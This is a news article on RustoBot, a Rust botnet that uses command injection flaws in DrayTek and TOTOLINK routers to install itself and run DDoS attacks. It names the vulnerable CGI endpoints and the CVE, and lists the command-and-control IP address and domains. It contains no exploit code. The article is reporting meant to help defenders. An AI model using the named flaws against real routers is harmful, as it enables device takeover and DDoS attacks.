Skip to content

New RustoBot malware hijacks routers to inject commands

  • by
  • 2 min read

A new advanced botnet malware written in the Rust programming language was uncovered targeting vulnerable routers around the world. It abused critical flaws in DrayTek and TOTOLINK routers to remotely run command injections, possibly impacting technology sectors of Mexico, Taiwan, Vietnam and Japan.

Cybersecurity researchers named the malware “RustoBot” because of its Rust-based implementation. The malware mainly targets DrayTek Vigor2960 and Vigor300B through CVE-2024-12987, an OS command injection vulnerability found in the ‘cgi-bin/mainfunction.cgi/apmcfgupload’ interface. The attack sequence starts with an effective payload that exploits the vulnerabilities.

Similarly, the malware targets TOTOLINK router models, such as N600R, A950RG, A800R, A830R, A3100R, A3000RU, and A810R, via flaws in the ‘cstecgi.cgi’ file which is a CGI script that handles administrative commands and user inputs.

The command injection vulnerabilities in the script enabled threat actors to execute code remotely on breached devices. A custom request containing a malicious command string sent to the weakened ‘cstecgi.cgi’ endpoint downloads and runs the malware on the compromised device.

Fortinet researchers found that after the initial attack, RustoBot uses four different downloader scripts to deliver multiple architecture-specific payloads targeting the ARM5, ARM6, ARM7, MPSL, and MIPS architectures. The multiple-architecture approach makes the malware compatible with several router models and systems.

RustoBot has a complex design which utilises advanced techniques for operation and evasion. It uses XOR encryption to encode its configuration data and fetches system API functions from the Global Offset Table (GOT).

The botnet uses intricate instruction sequences to determine decoder key offsets. When it is installed on a breached system, the malware attempts to resolve four domains to the same IP address (5.255.125.150) to connect to the command-and-control infrastructure. The domains resolved are dvrhelper.anondns.net, techsupport.anondns.net, rustbot.anondns.net, and miraisucks.anondns.net.

Following the established connection, it waits for set of parameters that acts as commands to trigger a DDoS attack. It is capable of launching DDoS attacks via the Raw IP, TCP and UDP protocols.

The new threat draws attention to the vulnerabilities found in network and IoT devices as well as the evolving complexity of botnet malware using modern programming languages such as Rust for enhanced stability and cross-platform compatibility.

In the News: Ad-fraud operation monetises piracy via WordPress plugins

Arun Maity

Arun Maity

Arun Maity is a journalist from Kolkata who graduated from the Asian College of Journalism. He has an avid interest in music, videogames and anime. When he's not working, you can find him practicing and recording his drum covers, watching anime or playing games. You can contact him here: arunmaity23@proton.me

Related Reads

This is an image of hacked security privacy

Co-op partially shutters IT systems after cyberattack

This is an image of protonmail featured 13

Indian government directed to block Proton Mail

This is an image of dark web hacker security

Malware-laden text editor used to target Uyghur users

This is an image of phishing featured storyblocks

Over 30,000 Australian banking credentials stolen

This is an image of nvidia featured 133133

Nvidia Riva API at risk of DoS attacks and data extraction

This is an image of galaxy s21 fe 3

Galaxy devices can leak passwords via clipboard bug

>